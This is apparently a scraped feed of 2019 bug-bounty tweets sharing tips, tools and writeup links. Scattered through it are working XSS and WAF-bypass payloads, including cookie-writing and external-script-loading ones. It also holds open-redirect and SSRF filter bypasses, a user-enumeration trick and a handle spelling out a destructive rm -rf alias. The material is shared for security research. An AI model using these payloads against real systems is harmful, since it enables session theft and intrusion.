0 [ #BugBounty #bugbountytip ] - Cross site request forgery 💰 Video : https://t.co/0W0FfO385m Paper : https://t.co/IE1UEx1ApU or https://t.co/m3h6mYdblI Cheatsheet : https://t.co/FVweb3zDCG Writeup : https://t.co/RZg50gukWu or https://t.co/NwHDQOmKo8 or https://t.co/7SoDFPXLxN
Hussein Daher
@HusseiN98D


2019-07-11 22:31:03
0 What is your manual recon approach? Mine: -Github -Censys -Shodan -Google dorks -Bing search #bugbountytip #bugbountytips #bugbounty
Cyberthereaper
@Cyberthereaper3


2019-07-11 18:45:25
1 I earned 500$ for my Submission on HackerOne ❤ #Hacker0x01 ❤️ #hackerone ❤ #bugbountytip ❤ #infosec ❤
securibee 🐝
@securibee


2019-07-11 18:36:18
0 dedupe and sort your wordlist in place sort -u -o wordlist.txt wordlist.txt #bugbountytip #infosec
Ben Sadeghipour
@NahamSec


2019-07-11 15:30:34
6 Here's this weeks Bug Bounty Protip! If you have some tips you'd like me to share, send them my way and I may use them for in the future. More on my stream this Sunday at 10:00am PDT! #bugbountytip https://t.co/pnw3EFhVWO
HackIsOn ®
@hackison


2019-07-11 12:05:09
3 Cloudflare #WAF Bypass Just use {alert`1`} instead of alert(1). Any #XSS vector will work (except <script>). #BruteTips #bugbounty #bugbountytips #bugbountytip #Https #malware #vulnerability #webdev #CMS #opensource #Linux #API #infosec #DDoS https://t.co/MZNlWR8wGn
c0mr3x
@c0mr3x


2019-07-11 11:50:57
0 Found XSS in private bug-bounty .. document was filtered, so as () .. my final payload -> javascript:setTimeout`\x64ocument.write\x28\x64ocument.\x63ookie\x29` #bugbountytip #BugBounty
Petko D. Petkov
@pdp


2019-07-10 17:48:17
1 “If you set your goals ridiculously high and it’s a failure, you will fail above everyone else’s success.” — James Cameron #bugbountytip
SΛKYB
@sakyb7


2019-07-10 15:41:46
0 Here is writeup for an interesting Account takeover vulnerability. #bugbounty #bugbountytip #TogetherWeHitHarder https://t.co/aZe7EB0SYY
Tyrell Wellick
@TyrellWellick00


2019-07-10 15:15:14
0 Just found an app which keep its chat backup in plain text. @three_cube #bugbountytip #messaging #Hackers Pro tip : Always try to access the chat database of the messaging or chatting app you use. I was able to access the messages in the plain text. https://t.co/sq4n7wI2TV
Fisher
@Regala_


2019-07-10 08:59:14
0 It's that time of the year 🥳🙏 @Burp_Suite #bugbounty #bugbountytip https://t.co/pKonoklXxL
Touhid M Shaikh
@touhidshaikh22


2019-07-09 23:51:12
0 Subdomain Takeover Basic Understanding https://t.co/PcSPMI33IT #BugBounty #BugBountyTip #subdomain #basic https://t.co/Q3pNvsOwQH
Mike Lierman
@MikeLierman


2019-07-09 22:06:18
0 @0xInfection #infosec #bugbounty #bugbountytip What. No way. I didn't know this!
Nikos Gkogkos
@ngkogkos


2019-07-09 20:27:29
0 Email clients' browser engines are fascinating! Often you can control the layout of generated emails by messing with HTML/CSS. Example payloads to affect how emails render: <% <!-- <p style="display:none;" <div style="visibility:hidden"> #BugBounty #BugBountyTip #BugBountyTips
Ammar Amer
@cry__pto


2019-07-09 13:46:09
2 1500 link to awesome resources and the number will continue get higher until it reach 2000 link during the next few coming days. #BugBounty #Hacking #Malware #redteam #cybersecurity #infosec #pentest #BugBountyTip https://t.co/q2layzVpKz https://t.co/2XyhkruBx7
David Vieira-Kurz
@secalert


2019-07-09 09:41:19
0 Besides @Burp_Suite, CIRT nikto and nmap with NSE ... which other web security scanner would you recommend these days which costs max $500 pro year AND work on mac/linux? #infosec #BugBounty #BugBountyTip #bugbountytips
alias ls=' rm -rf /'
@spyerror


2019-07-09 06:53:23
0 Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex. Dec: <svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #Bypass #WAF #XSS #Cloudflare #BugBountyTip
Coding_Karma
@karma_coded


2019-07-08 21:38:01
0 That moment when you fuck around with APIs for PII leakage then find a file that has it all and no access control configuration chain with IDOR and BAM entire DB 🤯😂 #bugbounty #bugbountytip #infosec #security https://t.co/L4P8vfzTG2
securibee 🐝
@securibee


2019-07-08 19:59:27
0 https://t.co/kG7era7rGr analyze a chrome extensions risk before using it by @duo_labs be safe out there. #infosec #bugbountytip
Ammar Amer
@cry__pto


2019-07-08 17:34:47
1 Obtaining Login Tokens for an Outlook, Office or Azure Account. https://t.co/0uHH0nM2XI #BugBounty #bugbountytip
alias ls=' rm -rf /'
@spyerror


2019-07-08 17:05:29
0 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #BugBountyTip #WAF #Researcher #Bug #Security #BugBounty
Infected Drake
@0xInfection


2019-07-08 16:26:48
12 I learnt today that IP addresses can be shortened by dropping the zeroes. Examples: http://1.0.0.1 → http://1.1 http://192.168.0.1 → http://192.168.1 This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted. #infosec #bugbounty #bugbountytip https://t.co/2zcrLCmq0R
healthyoutlet
@healthyoutlet


2019-07-08 15:55:58
0 what's one of the lesser-known tools in your bug bounty arsenal? I'm not sure how many of you are using this one but I do a lot of API testing with postman https://t.co/SBo6D8qPKN #bugbounty #bugbountytip
bl4de
@_bl4de


2019-07-08 15:35:25
3 One of the best set of #bugbountytips ever, in one thread Read, learn, use daily and share with others 😁 #BugBounty #bugbountytip #hacking #PenTest #ITSecurity https://t.co/nL4Co2SBNs
Fisher
@Regala_


2019-07-08 15:18:28
2 Awesome thread of bounty tips by @pdp 🥳🥳🥳 #bugbounty #bugbountytip https://t.co/x48UW2of2G
Hussein Daher
@HusseiN98D


2019-07-08 12:47:18
2 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #BugBountyTip
alias ls=' rm -rf /'
@spyerror


2019-07-08 12:07:53
2 Another #Cloudflare #XSS #Bypass xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> #WAF #BugBounty #BugBountyTip
chouaib Hm
@chouaibhm


2019-07-08 10:55:49
0 Abusing PHP Query String parser bypass IDS/IPS/WAF #bugbountytip #infosec #Pentesting #BugBounty https://t.co/JdZbeT4GGt
David Vieira-Kurz
@secalert


2019-07-08 10:03:17
1 who else is attending Global AppSec - Amsterdam (September 23-27) this year? #infosec #BugBounty #bugbountytip
alias ls=' rm -rf /'
@spyerror


2019-07-08 07:51:27
0 While the money is still in the hands, in the near future, everyone will witness, although only a part will witness. #WAF #BugBounty #BugBountyTip #Cyber #Researcher
Ammar Amer
@cry__pto


2019-07-08 06:57:29
2 check out the new awesome resources in my repository.i had added 87 link to advanced resources to my github repository . and the number will reach 2000 link .at any time soon. #OSINT #Hacking #PenTest #redteam #malware #CyberSecurity #BugBountyTip https://t.co/q2layzVpKz https://t.co/EF7u0ghngC
incredincomp
@incredincomp


2019-07-08 04:07:45
2 Is the private IP scheme disclosure considered a bug or should I literally be trying to pivot to a different OSI layer(and if I cant, should I still report that I know how to find more info)? Obviously scope aware, just curious if anyone'd care. I would #bugbounty #bugbountytip
Michael Blake
@Michael1026H1


2019-07-08 03:12:43
0 #bugbountytip Need a redirect, maybe a 301 or 303? Use https://t.co/YyaeYQFrkP to get a quick URL. You can configure it using this guide https://t.co/jUbe32eeJq Great for SSRF.
Bug Bounty TuT
@BugTut


2019-07-07 20:10:49
0 Guide 001 |Getting Started in Bug Bounty Hunting.. Start Bug Bounty 1st To Last.. Thanks To @KHIZER_JAVED47 Article Link:- https://t.co/CrabN9jmjz #BugHunting #BugBounty #BugBountyTip #bugbountytips https://t.co/DL2zcol7CI
Amit Dubey
@MrR0Y4L3


2019-07-07 15:59:16
0 Burp suite extensions which I found quite useful - 1. ActiveScan++ 2. Knife (https://t.co/C9kkI166eA) 3. SSLScan 4. AutoRepeater 5. Software Vulnerability Scanner 6. Logger++ 7. ErrorMessageCheck Suggestions are welcome :) #burpsuite #pentest #infosec #BugBountyTip #bugbounty
Nikos Gkogkos
@ngkogkos


2019-07-07 14:03:11
0 If you are like me, running hundreds of #gobusters, you may find this #bash function useful, it cats X most recent output files. Assumes all output is under CWD, & "may" work w/ mixed output files. Grep by "Found:", length.. See comments for code. #BugBountyTip #pentest #infosec https://t.co/dsy0tuX2Yq
Hussein Daher
@HusseiN98D


2019-07-07 13:47:43
4 An overview of what I did for my recent $10 000 bug. Always go for the highest impact! #bugbounty #bugbountytips #bugbountytip https://t.co/DnHxbneXuN
Nikos Gkogkos
@ngkogkos


2019-07-07 13:34:20
0 If you are like me, running hundreds of #gobusters, you may find this #bash function useful, it cats X most recent output files. Assumes all output is under CWD, & "may" work w/ mixed output files. Grep by "Found:", length.. See comments for code. #BugBountyTip #pentest #infosec
Sarvagya Sagar
@0ffensivemitthu


2019-07-07 12:34:01
1 [ My Blog Post #02 ] -- Repost : Read this , Definitely you'll fall in love with Regex : “Fall in love with Regex” by Sarvagya Sagar https://t.co/7a9Cd89oXR 🌈 #BugBounty #bugbountytips #BugBountyTip #infosec #infosec19 #CyberSecurity
Securisec 🚀
@securisec


2019-07-07 04:16:41
0 "RT RT 0ffensivemitthu: [ #BugBounty #BugBountyTip ] -- 💰 HTTP Parameter Polution Intro : https://t.co/OKBqqZF4Bj Slide : https://t.co/VEBRb0yY4N Writeup : https://t.co/ztjLNd2OAO or https://t.co/Zn2HnUb3KO Report : https://t.co/oiTVmyXxKn or https://t.co/PSDeo1D7dM 🌈"
Ammar Amer
@cry__pto


2019-07-07 00:13:09
2 and now there is 1300 link to important resources in the world of hacking. check out the new links about redteam,exploit development ,oscp,,etc. #BugBountyTip #Hacker #infosec #exploitation https://t.co/ldxTY0MZIt https://t.co/PF1Q8znOCz
Ammar Amer
@cry__pto


2019-07-06 18:19:06
1 Server-Side Request Forgery (SSRF) vulnerability on https://t.co/fOlTXYOTDJ: https://t.co/GXSRfRqpAP #BugBountyTip #BugBounty
Sarvagya Sagar
@0ffensivemitthu


2019-07-06 11:16:50
3 [ My Blog Post #01 ] -- Repost , My first blog post . 💰 "Hunt Unvalidated Url Redirects in wild” by Sarvagya Sagar https://t.co/wzsdk1bURQ #BugBountyTip #bugbountytips #BugBounty #infosec #infosec19 #CyberSecurity #infosecurity
Sarvagya Sagar
@0ffensivemitthu


2019-07-06 10:45:25
1 [ #BugBounty #BugBountyTip ] -- 💰 HTTP Parameter Polution Intro : https://t.co/RGUfzyX8ZU Slide : https://t.co/zjSdRsojm4 Writeup : https://t.co/WGU4ctF86X or https://t.co/QC3kdoISbR Report : https://t.co/TIK43b00zX or https://t.co/GsmuDR1DLa 🌈
alias ls=' rm -rf /'
@spyerror


2019-07-06 10:20:10
0 Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
Ammar Amer
@cry__pto


2019-07-06 00:52:12
1 new links were added to the repository . about OSCP and Advanced google hacking technique and dorks for various attacks. check it out. the number of the links now 1271 and it will get higher everyday. #BugBountyTip #Hacking #infosec #OSINT https://t.co/q2layzVpKz https://t.co/6hsjupaauu
Ammar Amer
@cry__pto


2019-07-05 22:14:51
3 new links were added to the repository . check it out.the number of the links now 1225 and it will get higher everyday. #BugBountyTip #Hacking #infosec #redteam #CyberSecurity #bugbounties https://t.co/q2layzVpKz https://t.co/T0xtpz7hUK
Fisher
@Regala_


2019-07-05 22:00:07
3 https://t.co/iKUQ75PaLI - @ngalongc highlights why you should always read the documentation when hunting on a program. And also kudos for @yaworsk and @ShopifyEng for triaging even being a "hypothetical" #bugbounty #bugbountytip
Sparsh Kulshrestha
@d0tdotslash


2019-07-05 20:10:24
0 @NahamSec @yappare I usually try #BugBountyTip when searching for random tips and tricks.
Mehmet Aura
@rootaura


2019-07-05 19:59:15
0 I released my tool which name is "BountyBot" It checks unclaimed social media accounts which linked on page etc etc. (by the way im new at py) https://t.co/VKBHPVlzcD #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd https://t.co/teDQJ4Kf1h
Jatin
@techyfreakk


2019-07-05 18:25:10
7 For shortening Linux commands, you can use the alias command As an Example, alias nmapq="nmap -Pn -T4 -A" Now just run nmapq $target Add it to /home/user/.bashrc, and you're good to go 🙂 #linuxtip #bugbountytip
Samet ŞAHİN
@sametsahinnet


2019-07-05 17:42:15
1 How to steal #CSRF Tokens with simple #XSS vulnerability ? https://t.co/140rJjo5Nt #BugBountytip #bugbounty #infosec #hacking #TogetherWeHitHarder
architect
@architectt1


2019-07-05 14:13:30
0 Re-exploited Open Redirect on a private program where I reported that and got a bounty for it not so long ago. Always try other strategies once a report has been resolved. #bugbountytip #bugbounty #infosec #security
CaptainFreak
@0xCaptainFreak


2019-07-05 13:40:52
0 Learn about ZAP @zaproxy from this video if you use Burp extensively and find ZAP UI intimidating. Also the HUD feature👌, Awesome stuff @Bugcrowd @david_scrobonia https://t.co/nJ1IDtgBWE #bugbountytip
Dhaval Panchal
@cedhaval02


2019-07-05 06:53:04
0 @Divya_Bhaskar Hey, recently i checked out your website and i seen some bugs point that i have attached in below..have a good day to all :) #news #bugbountytip https://t.co/6Iqidefm2y
Sarvagya Sagar
@0ffensivemitthu


2019-07-05 05:58:19
0 [ #BugBounty #bugbountytip ] -- 💰 Open redirects Vedio : https://t.co/kwvNvWlelM or https://t.co/2ggZiuHoN5 Writeup : https://t.co/fbZ4b2H9eu or https://t.co/wzsdk1bURQ Reports : https://t.co/OuP4nBeJOo or https://t.co/mk1I69zu6k Cheatsheet : https://t.co/yQSgrOPjVt 🌈
Bohdan Korzhynskyi
@h1_ragnar


2019-07-04 22:01:43
8 Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
Bohdan Korzhynskyi
@h1_ragnar


2019-07-04 21:15:37
0 Cloudflare #XSS #Bypass via dot '"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
vavkamil
@vavkamil


2019-07-04 20:37:31
0 Just launched v1.0 of https://t.co/jZS6PtN22C ~ Latest bug bounty related tweets ~ #bugbountytip
HackIsOn ®
@hackison


2019-07-04 14:58:57
1 “Account Takeover Using CSRF(json-based)” by shub rathore https://t.co/4Obn65Bode #bugbountytip #bugbounty
Dawood Ikhlaq
@daudmalik06


2019-07-04 13:49:28
1 Just Bypassed Custom Firewall with URL encoding technique: Final Payload: %253%63svg%2520onload=alert(1)%253%65 the firewall was blocking "%253c", Trick: %25 3 %63 -> when the app decoded it, it become %3c -> app decoded it again and it become < and got alert #bugbountytip
$!|3nt_4unt3r
@shub66452


2019-07-04 11:31:04
58 My first blog #bugbounties #bugbountytip https://t.co/scMySo36WD
Neolex
@NeolexSecurity


2019-07-04 10:32:15
0 Hey guys, I have an XSS that works on IE/Edge due to the non-encoding of the url. There is a way to make it work on firefox/chrome ? #bugbounty #bugbountytip
darkmage
@therealdarkmage


2019-07-04 02:16:25
0 TIL that %c2%a0 can be used to overcome XSS defenses. #BugBounty #bugbountytip #bugbountytips
David Alison
@Nokibulislam1


2019-07-04 01:26:22
1 #BugBountyTip: Have a char limit for XSS? See if it’s appended with other fields (first + last name). You can then split the payloads (this case needed JQuery to load ext script): FirstName: “><svg/onload=“$.getScript(‘http://‘+ LastName: ‘https://t.co/fSzBPqvWxY’)..” #bugbounty
Arif Khan
@payloadartist


2019-07-03 20:05:26
29 Common Android #security vulnerabilities #bugbounty #bugbountytip https://t.co/ZnNDzj51o9
Petko D. Petkov
@pdp


2019-07-03 17:56:05
1 The real impact of a vulnerability is measured by its potential - not just the current impact but future impact as well. Real attackers can sit on a vulnerability for years. #bugbountytip
Yash Sodha 🌟
@y_sodha


2019-07-03 17:53:31
13 #BugBountyTip: Always remember to check emails for access control issues. Sometimes the same access control is not applied when sending emails. Thanks @gitlab for the bounty! https://t.co/sqzqBCph6F
Siva krishna
@le4rner


2019-07-03 16:21:43
54 I don't know why and how this bypassed cloudflare. But here it is javascript:{ alert`0` } @rodoassis @s0md3v @akhilreni_hs #bugbountytip #xssbypass PS: Pros are welcome to give your insights about this.
Abugzlife
@abugzlife1


2019-07-03 15:41:43
16 #BugBountyTip: Have a char limit for XSS? See if it’s appended with other fields (first + last name). You can then split the payloads (this case needed JQuery to load ext script): FirstName: “><svg/onload=“$.getScript(‘http://‘+ LastName: ‘https://t.co/WKmfmkNmNp’)..” #bugbounty
soaphorn seuo
@soaphornseuo


2019-07-03 10:23:09
5 [ #BugBounty #bugbountytip ] -- Cracking the Lens : Paper : https://t.co/ydXjQUxyVY Video : https://t.co/qerJ8DXT5g or https://t.co/twNLJFmczy Writeup : https://t.co/skBYPKjlUP Report : https://t.co/oblok1GZic
Morphine 'Ashraf'
@m0rph1n3e


2019-07-03 08:47:08
5 #bugbountytip #bugbounty #triagertip #bugbountytips #infosecurity #infosec I've found a reflective xss vulnerability, but it only works in IE, and Edge browser. Any idea, how to exploit it in the other web browsers using HTML file or directly by visiting the vuln endpoint?
Garth Humphreys
@garthhumphreys


2019-07-02 22:48:56
3 I think consistency is important in anything you do, especially with #infosec and #bugbounty - Consistently keep pushing to #learn more and #try harder, even if it's one line of code a day 🙂 #bugbountytip #bugbountytips
Alejandro Parodi
@SecSignal


2019-07-02 20:04:10
17 #BugBountyTip If you can't use quoted strings in your XSS payload, try to use regex functions that return strings! For example: t.setRequestHeader(([]+/Content-Type/g).substr(1,12),(([]+/application/g).substr(1,12)+([]+/json/g).substr(1,4)) Also, + can be %2b ;) #WAF #BugBounty
Fisher
@Regala_


2019-07-02 17:01:51
12 Ayyyy! Got featured on the latest hacking newsletter by @PentesterLand 🥳 Have a look and show some love, this person has been doing an amazing job on collecting, sharing resources and putting content out there for all BB fellows ❤️ #bugbounty #bugbountytip https://t.co/NEcoXNaZSL
Cade
@persian_mh17


2019-07-02 15:36:02
4 Enumerate websites that are accessible through HTTP/HTTPS (Specifically), in other words it can identify live websites for further testings #recon #bugbountytip https://t.co/LwB0soe7Y7
eForensics Magazine
@eForensics_Mag


2019-07-02 14:43:00
6 Bug Bounty Methodology (TTP- Tactics,Techniques and Procedures) V 2.0 | By Sanyam Chawla https://t.co/IF6mmn6OcE #bugbounty #bugbountyhunter #bugbountytip #bugbountyhunting #cybersecurity #digitalforensics
Ismail Tasdelen
@ismailtsdln


2019-07-02 04:23:11
5 If you have a web subdomain list in your hand and you want to capture them. A app that may be useful to you. 😎 --> https://t.co/XAqQJ91Tck #bugbountytip #bugbounty #websecurity
Fisher
@Regala_


2019-07-01 15:07:40
2 Did you know... triagers try to escalate your reports before handing them to the company? 😳💰 Show some love for them 😍 #bugbounty #triagertip #bugbountytip
[email protected]
@k3va1


2019-07-01 14:01:55
5 #bugbountytip When you get path from where files are downloading remove file from url and run dirsearch with @Jhaddix's all.txt you will get juicy info😍
Petko D. Petkov
@pdp


2019-07-01 09:53:46
1 This new tool allows you to discover secrets at hyper-scale. #bugbountytip #bugbountytips #cloudflare https://t.co/jXFuNyxVlK
SaadAhmed
@XSaadAhmedX


2019-07-01 08:15:27
88 Here the write-up of IDOR 🧐 https://t.co/3haNz2hZfa #bugbountytip #bugbountytips #bugbounty @Bugcrowd
Sarvagya Sagar
@0ffensivemitthu


2019-07-01 08:10:32
28 [ #bugbountytip ] Open Redirection : If https:// are blacklisted then Try Japanese Punctuation Symbols like 〱, ー , ゝ , 〵 , 〽 , 〳 etc Example : ゝgoogle%2Ecom /ゝgoogle%2Ecom - Also try Unicode of these Symbols . #BugBounty #CyberSecurity #bugbountytips #infosec #infosec19
Petko D. Petkov
@pdp


2019-07-01 07:44:10
1 What is your average severity level? #bugbountytip #bugbountytips
Ameen
@ameenmaali


2019-07-01 07:15:41
1 #BugBountyTip: Take a break/relax every so often! After trying to learn too aggressively for 5 months straight, I got burnt out and submitted nearly nothing for a month+, going from my best to worst month. I’m feeling much better and ready to get back to it now in a relaxed pace https://t.co/IO7OoP88qf
Sarvagya Sagar
@0ffensivemitthu


2019-07-01 00:20:12
2 - #bugbountytip #0xWilt What I Learned Today #03 : Open Redirection : If domain name is blacklisted , then try IP Address in Canonical notation , Decimal , hex or octal notation to bypass blacklisted domain . #bugbountytips
Garth Humphreys
@garthhumphreys


2019-06-30 23:36:56
2 So basically... the #recon phase never ends. Keep digging for more info #bugbounty #bugbountytip #hacking #infosec

@pouyana1


2019-06-30 20:57:45
2 enumerating exchange users through outlook web login page: invalid users have longer response time than valid users, an attacker can use this feature to enumerate a list of users, valid users response in lesser time than invalid user. #bugbountytip #infosec #hacking #hack
Petko D. Petkov
@pdp


2019-06-30 20:15:59
4 Tracking 197 bug bounty programs like a pro. I don't know about your shell scripts but this thing is hot. #bugbountytip https://t.co/WA5AznSIyr
Nikos Gkogkos
@ngkogkos


2019-06-30 20:12:42
16 Do you have a big list of URLs & want to fuzz them for XSS in the URL path? Use @TomNomNom's meg tool! 1. Add /?xss=xss1"2<3%22' in paths.txt 2. meg -L -c 5 paths.txt urls.txt ./megxss_out 3. grep -HC5 'xss1"' --color ./megxss_out/*/* #bugbounty #bugbountytip #pentest #infosec
Mhamed Kchikech
@mhamed_kchikech


2019-06-30 17:23:38
1 @SecuAudit @Hacker0x01 It's more like a #BugBountyTip
Sarvagya Sagar
@0ffensivemitthu


2019-06-30 15:15:08
13 What I learned Today : My Daily dose of progress thread. In this thread I will post whatever I learn, read or watch related to #infosec , #BugBounty , #bugbountytip , #Hacking, #CyberSecurity, #OSINT .Make sure to follow it to get regular quality content. Retweet to invite others
Fisher
@Regala_


2019-06-30 09:58:54
6 It's always good fun to hang out with @stokfredrik, shooting this video only felt natural 🙏🙏🙏 #bugbounty #bugbountytip https://t.co/8MHud7mIeX
n a f f y
@nnwakelam


2019-06-30 09:33:02
20 Learn to fuzz all available inputs and start inferring things based upon what you are being returned #bugbountytip
Navneet
@na5n33t


2019-06-30 08:32:52
4 CSRF token was absent in POST request but value of parameter wishlistID is unique and not known to attacker can protect it from CSRF. Tried to submit it with blank value and successfully able to perform CSRF. Waiting for reply of team. #bugbountytip #hackerone #bugcrowd #infosec
Ashraf .G.
@U2w0k


2019-06-29 22:17:41
5 Got an XSS vulnerability but the domain is behind the annoying CloudFlare WAF .. couldn't get the original IP of the domain and couldn't bypass it neither. any suggestions? #BugBounty #togetherwehitharder #bugbountytip
Ammar Amer
@cry__pto


2019-06-29 21:08:52
5 surprise! all the links that i am sharing on my GitHub repository . been stored on my PC hard drive as a PDF files,there is more than 1,300 article as a PDF files,i am gonna share these file also on my GitHub repository. #Hacking #BugBounty #infosec #bugbountytip
SaadAhmed
@XSaadAhmedX


2019-06-29 19:33:23
168 BugBountyTip: If you playing with `API ENDPOINT` always try to send `INVALID CONTENT TYPE` end-up by getting hidden endpoints in `RESPONSE` #bugbountytip #bugbountytips #bugbounty https://t.co/fcaDHtJxiH
Yadhavi
@PrincessYadhavi


2019-06-29 18:12:36
1 I tried to scan a target with masscan, the input file has 522 hosts but masscan only scan 438 hosts. why?strange! PS: ( --rate=500) #masscan #bugbounty #bugbountytip #bugbountyhelp
Michael Blake
@Michael1026H1


2019-06-29 17:23:46
6 #bugbountytip The Burp extension Scan Check Builder is fantastic. You can build your own scan checks. Personally, I use this to passively detect and report things like URLs as parameter values and suspicious parameter names for manual testing.
iNoSec
@IsecEmAll


2019-06-29 10:28:43
1 If some bug Bounty hunter are against sharing their tools, because they Can lose some bounties, what do we think when they share others tools on twitter?? Rabbit hole or that's because that's not their own tools?? #bugbountytips #bugbountytip
CryptoCris
@cryptocris88


2019-06-28 16:44:48
9 Dev Update 2 - June We will challenge our dev community to find bugs with our Bug Bounty Program to win rewards up to $5,000. More information later. Also: dApp competition soon! https://t.co/crInkoRQNV #blockchain #bugbounty #bugbountytip #developers #gamedeveloper
Régis Deldicque
@RegisDeldicque


2019-06-28 13:17:31
1 #bugbounty #Bugbountytip #Hacking I wish to compare technical mechanisms in order to protect http flows. In the diagram below, I used a cost/complexity representation. Does it seem to you correct ? https://t.co/N0AWz0uVNW
Ali Çelebi
@_alicelebi


2019-06-28 06:26:32
3 Has anyone had successful stored XSS on Angular app recently? Would you mind sharing the payload? #BugBountyTip #bugbounty
m0z
@LooseSecurity


2019-06-27 23:48:12
6 Everytime I tell someone I'm a hacker. 😂 https://t.co/2k2YRO1wIY #BugBounty #bugbountytip #bugbountytips #infosec #infosecurity
detroitsmash and 22 others
@detroitsmassh


2019-06-27 21:39:19
7 If you are using burp’s match&replace feature for spoofing cors origin then changed it with something: https://t.co/FUG19N5qeS instead of default one. Coz developers mostly forgets to escape dot with \. in their regex #bugbountytip
1984isnow📖
@_gonzacabrera


2019-06-27 19:00:49
1 Me downloading Burp Suite Professional cracked. #Infosec #BugBounty #BugBountyTip #ProTip #VolveCristina https://t.co/VvJQHNXak5
C1h2e1
@C1h2e11


2019-06-27 15:50:39
4 https://t.co/cJ8kHgdWmM make your recon more fast and more easy #BugBountyTip #bugbounty #bugbountytips https://t.co/vr7ilRtyAc
Malav Sharma (Wolfdroid)
@ShMalav


2019-06-27 08:23:11
8 one liner to replace one word to another in a file in vim :%s/old_word/new_word/g this will replace the old word from all lines if present to new word .. #bugbountytips #bugbountytip
Osama Avvan
@osamaavvan


2019-06-27 06:11:10
39 A writeup about CORS TO CSRF @Bugcrowd #BugBounty #bugbountytip https://t.co/7oeic4UuA3
David Alison
@Nokibulislam1


2019-06-26 15:32:28
0 Open Redirect : If http:// is blacklisted then try to Play with (Forward/Backward) Slash , browsers act as // Ex: //google%2Ecom ; /\google%2Ecom ; \/google.com ; /\/\google%2Ecom ; \/\google%2Ecom ; \/\/google.com ; #BugBounty #bugbountytip #infosec19 #infosec #cybersecurity
mAshraf
@mAshraf9_


2019-06-26 15:10:16
0 A security engineer's strength lies not in his skills or in the number of ZERO day of attacks he knows, but in the intensity of his understanding about security issue. #bugbountytip #bugbounty #bugbountyquote
Akshay Kumar Malhi
@Kumar_Akkiy


2019-06-26 10:06:18
0 Guys I got private invitation program from #hackerone, after getting 26 points on hackerone CTF program, so I need your feedback on private invitation programs. @KHIZER_JAVED47 @PratikY9967 @D0rkerDevil @AliRazzaq_ Thanks 🙏 #BugBounty #bugbountytip #togetherwehitharder
🕋 wareeq shile👨🏾‍💻
@wareeq_shile


2019-06-25 18:56:13
11 For monitoring js files https://t.co/93m2ozPlqe. Thanks for sharing @Mahmoud0x00 #bugbountytips #bugbounty #bugbountytip #BugBounty
Fisher
@Regala_


2019-06-25 18:39:36
3 🧐When writing a report involving different user roles, if possible, include your own testing credentials so it's easier for the team to validate. Happy triager = happy hacker 🥳 #bugbounty #bugbountytip
Sarvagya Sagar
@0ffensivemitthu


2019-06-25 14:48:52
43 Open Redirection -- You can use Chineese Separator "。" (%E3%80%82) instead of dot "." (%2E) when dot is blacklisted ... Example : target%2Ecom/reset-pass/users-token?go=google%E3%80%82com #bugbounty #bugbountytips #bugbountytip #Infosec #infosec19 #vulnerability #CyberSecurity
Broly
@Broly157


2019-06-25 14:37:26
0 @fuomag9 hey brother congrats for your 1st bug bounty. Can u give me some #bugbountytip.?? Plzz. I'm still studying various articles.
Thibeault
@thibeault_chenu


2019-06-25 11:49:06
2 @intigriti In the case of an e-commerce site, try to multiply the quantity by a value close to 0 (0.00008.....) this can allow you to get items for free. Tested at a food delivery site recently 👇 #BugBounty #BugBountyTip #HackWithIntigriti https://t.co/AzemqbmH2I
plenum 🇹🇳
@plenumlab


2019-06-25 11:16:20
24 Bash oneliner: - remove trailing characters/dots from large file cat myfile | while read i; do echo "${i%.}"; done - remove characters/dots from beginning of line cat myfile | while read i; do echo "${i#.}"; done Replace the . with anything you want #BugBounty #bugbountytip
0xd0m7
@0xd0m7


2019-06-25 09:14:21
37 #bugbountytip if you find a file like that "rest/v1/ swagger.json" it might be interesting to use the OpenAPI Parser BurpSuite plugin to do a quick job ;) https://t.co/PcAmOLRgai